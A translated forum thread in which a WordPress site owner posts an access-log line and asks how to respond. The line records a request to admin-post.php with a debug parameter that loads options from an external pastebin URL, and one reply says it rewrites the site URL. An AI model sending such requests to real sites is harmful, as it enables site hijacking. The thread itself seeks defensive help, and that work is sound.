There is a site with malicious activity in the site logs, what should I do?

A

Alexey selftrips.ru2019-03-25 11:27:49

CMS

Alexey selftrips.ru, 2019-03-25 11:27:49

[22/Mar/2019:06:47:35 +0300] 0.000 0.000 301 109.228.43.17 selftrips.ru GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url= https://pastebin.com/raw/ Th1EKR8i HTTP/1.1 "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/ 20100101 Firefox/64.0" "-" 755 141.8.194.54 selftrips

Provo antivirus responds to https://pastebin.com because it thinks it's a malicious site.
1. Where does this request form from outside or from inside?
2. 1 If from within, how to understand what forms it
2.2. If outside, what additional measures should be taken?

Reply

Answer the question

In order to leave comments, you need to log in

2 answer(s)

A

Alex Wells, 2019-03-25
@Alex_Wells

Outside. It's not clear what kind of "antivirus" it is, but pastebin is not a malicious site. It is worth throwing out your "antivirus".

V

Vag-kuz, 2019-03-25
@Vag-kuz

Alex, same problem. This link is used by a malicious code and changes the site_url in the Wordpress WB to some fake site. We cannot yet understand the mechanism of this.